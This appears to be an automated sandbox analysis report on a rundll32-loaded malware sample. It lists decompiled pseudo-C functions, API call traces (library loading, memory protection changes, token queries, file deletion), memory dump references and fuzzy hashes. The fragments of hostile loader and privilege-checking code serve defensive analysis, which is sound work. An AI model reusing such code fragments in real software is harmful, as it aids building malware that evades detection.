Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: lstrlen
String ID: GetCurrentPath
API String ID: 1659193697-3283422198
Opcode ID: 2777c302878e743329928b62ca6cdf5358687e0bb5186423c77c95a66ef2c9a1
Instruction ID: 41195c9a76874d14623ff530a364872f8f15e9d536d7495008c0b386dd41cbd3
Opcode Fuzzy Hash: 2777c302878e743329928b62ca6cdf5358687e0bb5186423c77c95a66ef2c9a1
Instruction Fuzzy Hash: 1F212B31B046966FEB01DEACC8804DEBBB7EB4F2C0B654679E981DB205D571DD868390

Uniqueness

Uniqueness Score: -1.00%

Function 693414E1 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(?,00008000,00008000), ref: 6934159C

Strings

u, xrefs: 69341708

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID: u
API String ID: 1263568516-1900653220
Opcode ID: e7a28eba2dc39247f65bfde7425fb5c6f5839e8c1731000680f5a306d40636bd
Instruction ID: 2167eb4b5afe2dc35e97cf936b047b4391e249a91e34a5e8835b39a7dfedc68b
Opcode Fuzzy Hash: e7a28eba2dc39247f65bfde7425fb5c6f5839e8c1731000680f5a306d40636bd
Instruction Fuzzy Hash: 92113976A58508EFCF50CFC8C880A9DBBF9FB2A790F124051E905AA260C335DE309B60

Uniqueness

Uniqueness Score: -1.00%

Function 69341700 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00008000,00008000), ref: 6934159C

Strings

u, xrefs: 69341708

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID: u
API String ID: 1263568516-1900653220
Opcode ID: 9899821b38d012ef4f8d6ba8ffa66c666ba76c3b7eb254230103bfa44ee9009c
Instruction ID: 9d554ff6eec78cd0fbfa07987818fa2f8c261e5ca8ef9e3c010c7ec9449f3ada
Opcode Fuzzy Hash: 9899821b38d012ef4f8d6ba8ffa66c666ba76c3b7eb254230103bfa44ee9009c
Instruction Fuzzy Hash: 85115B76958509EFCF41CFC8C880A9EBBF9FB1A750F124051E905A6250C335DE20DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000AB5A Relevance: 3.0, APIs: 2, Instructions: 44
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E1000AB5A(void* __ecx, void* __eflags) {
				char _v44;
				intOrPtr _t9;
				intOrPtr _t12;
				void* _t13;
				intOrPtr _t17;
				void* _t20;
				void* _t21;
				intOrPtr _t25;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t32;

				_t9 =  *0x10020d88; // 0x4a5fc98
				_t1 = _t9 + 0xac; // 0x8d7218ee
				_t21 = __ecx;
				E1000B687( &_v44,  *_t1 + 7, __eflags);
				_t32 = 0;
				_t12 =  *0x10020d58; // 0x4a5f900
				_t13 =  *((intOrPtr*)(_t12 + 0xd4))(0, 0, 0,  &_v44, _t28, _t31, _t20);
				_t29 = _t13;
				if(_t29 != 0) {
					GetLastError();
					ResumeThread( *(_t21 + 4));
					_t17 =  *0x10020d58; // 0x4a5f900
					_push(0x2710);
					_push(_t29);
					if( *((intOrPtr*)(_t17 + 0x30))() == 0) {
						_t32 = 1;
					}
					_t25 =  *0x10020d58; // 0x4a5f900
					 *((intOrPtr*)(_t25 + 0x34))(_t29);
					_t13 = _t32;
				}
				return _t13;
			}

0x1000ab5d
0x1000ab65
0x1000ab6d
0x1000ab76
0x1000ab7e
0x1000ab81
0x1000ab89
0x1000ab8f
0x1000ab93
0x1000ab95
0x1000aba3
0x1000aba9
0x1000abae
0x1000abb3
0x1000abb9
0x1000abbd
0x1000abbd
0x1000abbe
0x1000abc5
0x1000abc8
0x1000abc8
0x1000abce

APIs

GetLastError.KERNEL32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,10004FDB), ref: 1000AB95
ResumeThread.KERNELBASE(?,?,00000000,00000001,?,?,?,?,?,?,?,?,?,10004FDB), ref: 1000ABA3

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLastResumeThread
String ID:
API String ID: 1307702467-0
Opcode ID: e0380292c89d61967faadc1e71b21dd2ed37e96ee2b958516c278971ba358e4a
Instruction ID: 22877a52fd125be6f021b278ba47e52bd49f4af4be482d09d273dff15349f24a
Opcode Fuzzy Hash: e0380292c89d61967faadc1e71b21dd2ed37e96ee2b958516c278971ba358e4a
Instruction Fuzzy Hash: E1018632201220AFD341DBD8CCC8DEA7FF9EF8D691B514165F905E7226D730E84287A0

Uniqueness

Uniqueness Score: -1.00%

Function 100098AE Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E100098AE(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E10009473(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xb6) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E10009863(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E1000A27E( &_v8);
				return _t25;
			}

0x100098b1
0x100098b4
0x100098ba
0x100098bc
0x100098c1
0x100098c3
0x100098cd
0x100098ce
0x100098dd
0x100098d0
0x100098d0
0x100098d0
0x100098e1
0x100098e8
0x100098ee
0x100098ee
0x100098f3
0x100098fe

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,?,00000001,1001D948,?,10001118,000000B6), ref: 100098D0
LoadLibraryA.KERNELBASE(00000000,00000000,?,00000001,1001D948,?,10001118,000000B6), ref: 100098DD

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: e14d05eb210316d018ccb2ba3b7b0576afc8d155a285a03db9c7ad15f5cfd033
Instruction ID: 0a8907e418d20bcaecb58a7887a8f175eb85e45bc48063aec8ac5069f05a84aa
Opcode Fuzzy Hash: e14d05eb210316d018ccb2ba3b7b0576afc8d155a285a03db9c7ad15f5cfd033
Instruction Fuzzy Hash: 57F0A731700214ABE704DFADDC8589EB7EDDF852D0710807AF806D7265DE70ED4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000A3EC Relevance: 3.0, APIs: 2, Instructions: 18
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000A3EC() {
				struct HINSTANCE__* _t2;
				WCHAR* _t3;

				_t2 =  *0x10020e6c; // 0x0
				if(_t2 != 0) {
					FreeLibrary(_t2); // executed
					 *0x10020e6c =  *0x10020e6c & 0x00000000;
				}
				_t3 =  *0x10020e74; // 0x0
				if(_t3 != 0) {
					DeleteFileW(_t3);
					return E1000953B(0x10020e74, 0xfffffffe);
				}
				return _t3;
			}

0x1000a3ec
0x1000a3f3
0x1000a3f6
0x1000a3fc
0x1000a3fc
0x1000a403
0x1000a40a
0x1000a412
0x00000000
0x1000a425
0x1000a426

APIs

FreeLibrary.KERNELBASE(00000000,1000AA62,?,00000000,00000001), ref: 1000A3F6
DeleteFileW.KERNELBASE(00000000,1000AA62,?,00000000,00000001), ref: 1000A412

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: DeleteFileFreeLibrary
String ID:
API String ID: 547291962-0
Opcode ID: ca15c615ea0442b8dcceef320d0d966d6cbde59b05e70258221f303336b7117b
Instruction ID: 373ab761b7ea662e2ffe72f4665915744fcbba3f33783b47c61e70f7ed6e071f
Opcode Fuzzy Hash: ca15c615ea0442b8dcceef320d0d966d6cbde59b05e70258221f303336b7117b
Instruction Fuzzy Hash: D9E012716443115FFA40CF65EC89B6177EAEB452E1F228654F101D60B6CB71E8828B10

Uniqueness

Uniqueness Score: -1.00%

Function 693416C0 Relevance: 2.6, APIs: 2, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00008000,00008000), ref: 6934159C
VirtualAlloc.KERNELBASE(00001000,?,00001000,00000040,?,?), ref: 693416A3

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: fc8711e6c9ffa4beb7937d2e50c3f5b96ec249011ccc69c36144253984d3254d
Instruction ID: ae356e0cce545ae758bd50a7af9da22c5e2a0fda8700733f7b09f1c099a92d89
Opcode Fuzzy Hash: fc8711e6c9ffa4beb7937d2e50c3f5b96ec249011ccc69c36144253984d3254d
Instruction Fuzzy Hash: A9316972A08919DFCF41CFD8C880BEEBBF5BF1A744F560051E911AB251C3369960DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E41AC8 Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000003.2684224148.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_2e40000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bcfc43265826fb2468ab0714e424530cd57cdb6de9c70328cb8e27c4ef95002
Instruction ID: a526f59559203ab3b846335a418370360ea0db91d8f575f6f0a56396deda6539
Opcode Fuzzy Hash: 0bcfc43265826fb2468ab0714e424530cd57cdb6de9c70328cb8e27c4ef95002
Instruction Fuzzy Hash: A1616DB5D84208DFDF14DE98E894BEDB7B5EB08309F84E41AE90A6B251DB7499C0CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02E41161 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000003.2684224148.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_2e40000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382ac300e43c22af4d08a9d937eac035cafc2f83fc194c4d0399b387664a9422
Instruction ID: e50894416aa4e1eab3d0c552f537acb2e7a614ddc96b50f31df2c81d044e6fed
Opcode Fuzzy Hash: 382ac300e43c22af4d08a9d937eac035cafc2f83fc194c4d0399b387664a9422
Instruction Fuzzy Hash: 02319375D80208ABDF10AB94F884BED7676AB04308F45A151ED0DEF351DB315AC0EE69

Uniqueness

Uniqueness Score: -1.00%

Function 1000E550 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000E550(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E1000E425(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E1000E47C(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E1000953B( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x10020d78; // 0x4a5fb48
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x10020d78; // 0x4a5fb48
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x10020d78; // 0x4a5fb48
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}

0x1000e557
0x1000e559
0x1000e560
0x1000e562
0x1000e565
0x1000e56a
0x1000e56f
0x1000e579
0x1000e57c
0x1000e57f
0x1000e584
0x1000e586
0x1000e58c
0x1000e5ec
0x1000e5f4
0x1000e5fa
0x1000e601
0x1000e607
0x00000000
0x1000e608
0x1000e591
0x1000e592
0x1000e593
0x1000e594
0x1000e595
0x1000e596
0x1000e597
0x1000e598
0x1000e59d
0x1000e59f
0x1000e5a4
0x1000e5a5
0x1000e5af
0x00000000
0x00000000
0x1000e5b3
0x1000e5df
0x1000e5df
0x1000e5e7
0x1000e5ea
0x00000000
0x1000e5ea
0x1000e5b5
0x1000e5b5
0x1000e5b8
0x1000e5bb
0x1000e5bb
0x1000e5be
0x1000e5c0
0x1000e5ca
0x00000000
0x00000000
0x1000e5cf
0x1000e5d0
0x1000e5d3
0x1000e5d8
0x00000000
0x00000000
0x00000000
0x1000e5da
0x1000e5de
0x00000000
0x1000e5de
0x1000e60d

APIs

Part of subcall function 1000E425: GetCurrentThread.KERNEL32 ref: 1000E438
Part of subcall function 1000E425: OpenThreadToken.ADVAPI32(00000000,?,?,1000E56A,00000000,10000000), ref: 1000E43F
Part of subcall function 1000E425: GetLastError.KERNEL32(?,?,1000E56A,00000000,10000000), ref: 1000E446
Part of subcall function 1000E425: OpenProcessToken.ADVAPI32(00000000,?,?,1000E56A,00000000,10000000), ref: 1000E46B

Part of subcall function 1000E47C: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,10000000,00000000,00000000,?,1000E4FD,00000000,00000000,?,1000E526), ref: 1000E497
Part of subcall function 1000E47C: GetLastError.KERNEL32(?,1000E4FD,00000000,00000000,?,1000E526,00001644,?,1000B2C2), ref: 1000E49E

FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,10000000), ref: 1000E5F4

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
String ID:
API String ID: 1806447117-0
Opcode ID: aa8d589606b5220f078d07a6ead36c8afafdce5a0d430b0e1d324c349de55e11
Instruction ID: a5daf68a5848884b05e1b031ad6f812e530fc3d84fbea390b37ee7695869cd1c
Opcode Fuzzy Hash: aa8d589606b5220f078d07a6ead36c8afafdce5a0d430b0e1d324c349de55e11
Instruction Fuzzy Hash: 16217C71A00619AFEB00DFA9DC85AAEF7F8EF48781B104469F501E7265E730EE418B50

Uniqueness

Uniqueness Score: -1.00%

Function 02E40115 Relevance: 1.5, APIs: 1, Instructions: 49libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 02E40BF4

Memory Dump Source

Source File: 0000000F.00000003.2684224148.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_2e40000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8b2f8a9c19fb62d96504831496c34ceb0b85046b256d3e705a56a42eff2b5106
Instruction ID: 6821a94825a0c7be4fe6e2d1cc4645d151cc4a2bf16969ba557741683a04ac47
Opcode Fuzzy Hash: 8b2f8a9c19fb62d96504831496c34ceb0b85046b256d3e705a56a42eff2b5106
Instruction Fuzzy Hash: 9311E675D54109CFCB18CF98D4A0BECBBB1EF08319F4890A9D616AB752DB345A40CF14

Uniqueness

Uniqueness Score: -1.00%

Function 02E406F8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 02E40715

Memory Dump Source

Source File: 0000000F.00000003.2684224148.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_2e40000_rundll32.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 3f921a021b06faadadf04e1dd150e5bc554f80fc52f859d0b4c1867e9834f491
Instruction ID: 3790c29cdd7ba6e363087c757fc0deb772ddf9170c2fa225a0d3b101c5d4aa9d
Opcode Fuzzy Hash: 3f921a021b06faadadf04e1dd150e5bc554f80fc52f859d0b4c1867e9834f491
Instruction Fuzzy Hash: 47011275D94219DFEB189B90E884BBDB7B2FB04315F44E4A6E606AB251EB309990CF10

Uniqueness

Uniqueness Score: -1.00%

Function 02E40BEF Relevance: 1.5, APIs: 1, Instructions: 10libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 02E40BF4

Memory Dump Source

Source File: 0000000F.00000003.2684224148.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_2e40000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6f7a771a7bd6ec0b427a1a159c456b991fda65929091ba18c6b188f3352732bd
Instruction ID: 4e625387695377a0e210921740e1ddad7841cc8a3277efb4df8f9297b213a348
Opcode Fuzzy Hash: 6f7a771a7bd6ec0b427a1a159c456b991fda65929091ba18c6b188f3352732bd
Instruction Fuzzy Hash: 34C04C3044110E96DF18EAA0E0547EE77B5EB4030CF806065C1529AE52CB359B47D760

Uniqueness

Uniqueness Score: -1.00%

Function 10001080 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001080() {
				intOrPtr _t3;

				_t3 =  *0x10020d58; // 0x4a5f900
				 *((intOrPtr*)(_t3 + 0x30))( *0x10020d54, 0xffffffff);
				ExitProcess(0);
			}

0x10001080
0x1000108d
0x10001097

APIs

ExitProcess.KERNEL32(00000000), ref: 10001097

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2b86755eef37e4a4fa72631b151954adccbf1efd625a4e0672fc03aa96f5a87e
Instruction ID: a0e348b1a09c93d8210d5bf6eb699b5a5c7c1c68a6564356cb742122b7ca74c2
Opcode Fuzzy Hash: 2b86755eef37e4a4fa72631b151954adccbf1efd625a4e0672fc03aa96f5a87e
Instruction Fuzzy Hash: 6EC04031156250DFE740DBD4CC89F443FA5BF48311FA14690F515E65F6C73174419B11

Uniqueness

Uniqueness Score: -1.00%

Function 10009525 Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10009525(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x10020e64, 8, _a4); // executed
				return _t2;
			}

0x10009533
0x1000953a

APIs

RtlAllocateHeap.E77242D6(00000008,?,?,1000990B,00000100,00000001,100010BC), ref: 10009533

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c47fbf19ee1032a5d2d03ede0c8a872dd99239ed7408605079bd50c5965fc2cb
Instruction ID: 4cd8767747614ece8a9ef239bc440430a38d3079d97625af413d2659be67539a
Opcode Fuzzy Hash: c47fbf19ee1032a5d2d03ede0c8a872dd99239ed7408605079bd50c5965fc2cb
Instruction Fuzzy Hash: 90B09231080318BBEE021B81ED4AA843F6EFB19762F018090F608050B6CAB3A8A09B80

Uniqueness

Uniqueness Score: -1.00%

Function 10009510 Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10009510() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x10020e64 = _t1;
				return _t1;
			}

0x10009519
0x1000951f
0x10009524

APIs

HeapCreate.KERNELBASE(00000000,00096000,00000000,100010B7), ref: 10009519

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: ebb8cc13c00220491c8ace43191d6d9e5cbbcd3e021c18b2d0a2ef1822ffc219
Instruction ID: 17def3ddeca452d98569a718cab1156e5cb949d4afb7e22c317f5298dc0ffc81
Opcode Fuzzy Hash: ebb8cc13c00220491c8ace43191d6d9e5cbbcd3e021c18b2d0a2ef1822ffc219
Instruction Fuzzy Hash: 93B012B428131097FA104B104D86B0035515748B02F204005F601581E4C6F11040D525

Uniqueness

Uniqueness Score: -1.00%

Function 02E406E2 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 02E406E3

Memory Dump Source

Source File: 0000000F.00000003.2684224148.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_2e40000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 88fe856744cc425360d1a30c9bc8a59b032be182b301bf16f64d1c2a92f0268a
Instruction ID: 635b8e58fde6210fce468ae326bf770710f28c53becca4c9d9dbc970d57b68dc
Opcode Fuzzy Hash: 88fe856744cc425360d1a30c9bc8a59b032be182b301bf16f64d1c2a92f0268a
Instruction Fuzzy Hash: C5B01270494004DBD75D8710E844DDD7A30AB11200F40D5A0E683F3000CE30CA41CB30

Uniqueness

Uniqueness Score: -1.00%

Function 02E40105 Relevance: 1.4, APIs: 1, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000003.2684224148.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_2e40000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30269b090895166bbe13c55bfc90a8f6ec17342fa027b451788cb05830dff57e
Instruction ID: c9b8244b571c208d8e90beb3d6c0c34bcc1975d90b016caa2adea50fa10d096f
